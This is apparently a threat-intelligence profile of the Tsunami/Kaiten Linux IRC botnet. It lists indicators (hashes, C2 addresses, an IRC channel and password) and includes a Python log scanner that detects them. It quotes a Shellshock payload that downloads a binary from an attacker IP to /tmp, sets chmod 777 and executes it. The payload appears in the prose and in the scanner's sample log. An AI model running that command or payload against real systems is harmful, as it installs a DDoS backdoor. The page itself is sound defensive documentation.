Tsunami
Tsunami is a Linux malware family and IRC-controlled bot/backdoor widely associated with distributed denial-of-service (DDoS) activity and remote control of compromised systems. The content describes it as a Linux-based malware used primarily for DDoS attacks, with backdoor capabilities, and notes that it communicates over Internet Relay Chat (IRC) as its command-and-control channel. It has been referred to in detections and reporting as Tsunami/Kaiten, Kaiten, Keiten, and TsunamiKit in some contexts.
The malware has been observed on both IoT/embedded Linux devices and traditional Linux servers. Reporting in the content states that, unlike some IoT DDoS bots, Tsunami is distributed not only to IoT devices but also to Linux servers. It appears in multiple Linux intrusion chains involving brute-force attacks against SSH services, exploitation of public vulnerabilities, and post-exploitation payload deployment. Specific delivery contexts mentioned include Shellshock exploitation, Log4Shell-related botnet activity through the Muhstik variant, exploitation of Oracle WebLogic and Confluence vulnerabilities by the 8220 gang, and malicious VS Code repository/task abuse in the DPRK-linked Contagious Interview campaign where a Tsunami/TsunamiKit backdoor was deployed alongside XMRig.
Capabilities directly described in the content include IRC-based command reception, remote access/backdoor functionality, and DDoS attack execution. One Shellshock-delivered sample was an x86_64 ELF executable (MD5: aec2df8a6cb35aa5b01b0d9f1f879aa1) detected by many vendors as Tsunami/Kaiten; it functioned mainly as a DDoS client but also had backdoor capabilities and connected over IRC to 104.192.103.6. Another description states that a downloaded bashirc payload identified as Tsunami acted as a Linux backdoor allowing remote access while using IRC control as a client for DDoS attacks. In 8220-related activity, Tsunami payloads were identified by MD5 hashes 63a86932a5bad5da32ebd1689aa814b3 and 0ba9e6dcfc7451e386704b2846b7e440.
The content links Tsunami to several threat ecosystems and derivative malware. Remaiten was described as combining features of Tsunami and LizardStresser/Torlus. Muhstik was described as a Tsunami variant that borrows from Mirai code and, in one observed Log4j exploitation wave, added an ldm module that installed an SSH authorized_keys backdoor. SSHStalker was reported to use classic IRC botnet mechanics and to include known malware families such as Tsunami and Keiten in its toolkit. Rapper Bot’s alleged developer stated its code was derived from Mirai, Tsunami, and fBot. The China-linked 8220/Water Sigbin cryptomining operation used K4Spreader/Hadooken to deploy Tsunami together with mining payloads such as PwnRig/XMRig-derived miners.
Industries and victim environments mentioned in connection with Tsunami-related activity include cloud hosting environments, Linux SSH servers, routers and IoT devices, cryptocurrency/fintech/blockchain software engineers, and vulnerable enterprise applications such as WebLogic and Confluence servers. High-confidence indicators explicitly mentioned in the content include MD5 hashes aec2df8a6cb35aa5b01b0d9f1f879aa1, 63a86932a5bad5da32ebd1689aa814b3, and 0ba9e6dcfc7451e386704b2846b7e440; IRC/C2 infrastructure including 104.192.103.6, c4k-ircd.pwndns.pw, pwn.oracleservice.top, and 51.255.171.23; and one reported IRC configuration using channel #.br with password ircbot456@. ClamAV detections cited include Unix.Malware.Tsunami and Unix.Malware.Tsunami-9915807-0.
Vulnerabilities exploited
6 CVEs Mallory has correlated with this family across public research and vendor advisories.
The downloaded payload (md5: aec2df8a6cb35aa5b01b0d9f1f879aa1) is an x86_64 ELF executable that was submitted to VirusTotal and detected by many vendors as Tsunami/Kaiten. It mainly functions as a DDoS client, but also has backdoor capabilities, communicating over IRC.
ClamAV signatures include "Unix.Malware.Tsunami" in the list of malware activity associated with ongoing exploitation campaigns.
"Tsunami, a Linux-based malware used primarily for Distributed Denial of Service (DDoS) attacks, is also a key component of both infection chains."
Currently, there are few samples and the following vulnerabilities are exploited: CVE-2020-14882.
Groups observed using it
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
“bi.64 -> Tsunami… Tsunami is a popular botnet that controls and communicates through the IRC protocol. Its main functions include remote control and DDoS attacks.”
Listed in several Lazarus/BeaverTail/InvisibleFerret related items as “tsunami,” including “Lazarus Tsunami InvisibleFerret.”
Techniques & procedures
7 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique: “toolset blends… rootkit-class artifacts… PhoenixMiner… Linux.Cryptominer.Camelot… EnergyMech… Tsunami… Keiten… large back-catalog of Linux 2.6.x-era exploits”
Defense Impairment
1 technique: The injected BASH commands above download a file, change its permissions to read/write/execute for all users, and execute the file... chmod 777 /tmp/besh
Credential Access
1 technique: “SSHStalker breaks into Linux servers via mass SSH scanning and brute force…”
Command and Control
2 techniques: The command and control for Remaiten is handled by IRC communications. Additionally, the command and control is done through an actual IRC channel rather than only the IRC protocol.
We have observed a number of injected BASH commands that attempt to download malware to vulnerable hosts... wget -O /tmp/besh http://104.192.103.6/bosh; chmod 777 /tmp/besh; /tmp/besh;
Impact
2 techniques: Authorities claim they’ve gained control of Rapper Bot and stopped attacks emanating from what they described as “among the most powerful DDoS botnets to have ever existed.” ... Rapper Bot allegedly conducted more than 370,000 attacks... Officials said Rapper Bot regularly conducted DDoS attacks measured between two to three terabits per second, adding that Rapper Bot’s largest attack may have exceeded six terabits per second.
We have observed a significant amount of overtly malicious traffic leveraging BASH, including... DDoS... The idea here is to convert exploited Web servers into on-demand DDoS clients.
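The indicators listed in the summary above (the three MD5 hashes, the IRC/C2 hosts, and the #.br channel) and the Shellshock-style download, chmod, execute chain quoted under Command and Control can be turned into a small triage scanner. The following Python script is an added example written for this page; it is not code from Mallory or from any of the cited reports. The log lines it scans are constructed samples, and the `Finding` type and function names are this example's own. It matches the page's IOC values with bounded host matching (so 104.192.103.6 does not fire on 104.192.103.60), flags the bash function-definition prefix in a request, and recognises the fetch-to-/tmp, chmod, then execute-same-path pattern rather than any one URL.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Indicator values below are the ones listed in the summary on this page.
TSUNAMI_MD5 = {
    "aec2df8a6cb35aa5b01b0d9f1f879aa1",
    "63a86932a5bad5da32ebd1689aa814b3",
    "0ba9e6dcfc7451e386704b2846b7e440",
}
TSUNAMI_C2_HOSTS = {
    "104.192.103.6",
    "51.255.171.23",
    "c4k-ircd.pwndns.pw",
    "pwn.oracleservice.top",
}
TSUNAMI_IRC_CHANNEL = "#.br"

# Shellshock-style bash function-definition prefix injected into an HTTP header.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;\s*\};")
# Fetch to /tmp, chmod, then execute the same path (the chain quoted on this page).
DROP_AND_RUN_RE = re.compile(
    r"(?:wget|curl)[^;]*?(https?://[^\s;\"']+)[^;]*;\s*chmod\s+[0-7]{3,4}\s+(/tmp/[^\s;]+)\s*;\s*\2"
)
MD5_RE = re.compile(r"\b[0-9a-f]{32}\b")
IRC_JOIN_RE = re.compile(r"\bJOIN\s+(#\S+)")


@dataclass(frozen=True)
class Finding:  # hypothetical result type for this example
    line_no: int
    kind: str
    detail: str


def _contains_host(line: str, host: str) -> bool:
    # Bounded match so 104.192.103.6 does not fire on 104.192.103.60.
    return re.search(r"(?<![\w.])" + re.escape(host) + r"(?![\w.])", line) is not None


def inspect_line(line_no: int, line: str) -> List[Finding]:
    """Return every indicator or behaviour match found on one telemetry line."""
    findings: List[Finding] = []
    if SHELLSHOCK_RE.search(line):
        findings.append(Finding(line_no, "shellshock_header", "bash function-definition prefix in request"))
    m = DROP_AND_RUN_RE.search(line)
    if m:
        findings.append(Finding(line_no, "drop_and_run", f"fetch {m.group(1)} -> {m.group(2)}, chmod, execute"))
    for host in sorted(TSUNAMI_C2_HOSTS):
        if _contains_host(line, host):
            findings.append(Finding(line_no, "c2_host", host))
    for digest in MD5_RE.findall(line.lower()):
        if digest in TSUNAMI_MD5:
            findings.append(Finding(line_no, "known_sample_md5", digest))
    j = IRC_JOIN_RE.search(line)
    if j and j.group(1) == TSUNAMI_IRC_CHANNEL:
        findings.append(Finding(line_no, "irc_channel", j.group(1)))
    return findings


def scan_lines(lines: Iterable[str]) -> List[Finding]:
    """Scan any iterable of text lines (access log, proxy log, EDR events, IRC sensor)."""
    out: List[Finding] = []
    for n, line in enumerate(lines, start=1):
        out.extend(inspect_line(n, line))
    return out


# Constructed sample telemetry (not real captures): a web access log line carrying
# the injected command, a benign request, a proxy line to a C2 domain, an EDR file
# event with a known hash, and an IRC sensor fragment.
SAMPLE_LINES = [
    '198.51.100.7 - - [10/Oct/2024:13:55:36 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" '
    '"() { :; }; /bin/bash -c \'wget -O /tmp/besh http://104.192.103.6/bosh; chmod 777 /tmp/besh; /tmp/besh;\'"',
    '203.0.113.9 - - [10/Oct/2024:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    "2024-10-10T13:58:40Z proxy CONNECT c4k-ircd.pwndns.pw:6667 from 10.0.0.24",
    "2024-10-10T13:59:02Z edr file_create path=/tmp/besh md5=AEC2DF8A6CB35AA5B01B0D9F1F879AA1",
    "2024-10-10T13:59:10Z ircsensor 10.0.0.24 -> 51.255.171.23 JOIN #.br ircbot456@",
]

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LINES):
        print(f"line {f.line_no}: {f.kind}: {f.detail}")
```

Run it against real logs by feeding `scan_lines` an open file instead of `SAMPLE_LINES`. The behavioural rules (`shellshock_header`, `drop_and_run`) keep firing after the hard-coded hosts and hashes rotate, which is why they sit alongside the IOC sets rather than replacing them.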
IOCs tracked for this family
6 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
Recent activity
18 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A named malware family included in the report tags related to Linux SSH server threats.
Referenced as a Linux botnet family known for using altered UPX magic bytes in packed ELF32 binaries.
Referenced as a known Linux IRC bot family/toolkit component used within the SSHStalker ecosystem for IRC-based bot functionality.
Legacy IRC-controlled botnet malware referenced as part of the SSHStalker toolkit; samples/components were detected as “Win.Trojan.Tsunami-5” and include IRC bot behavior and DDoS-style routines.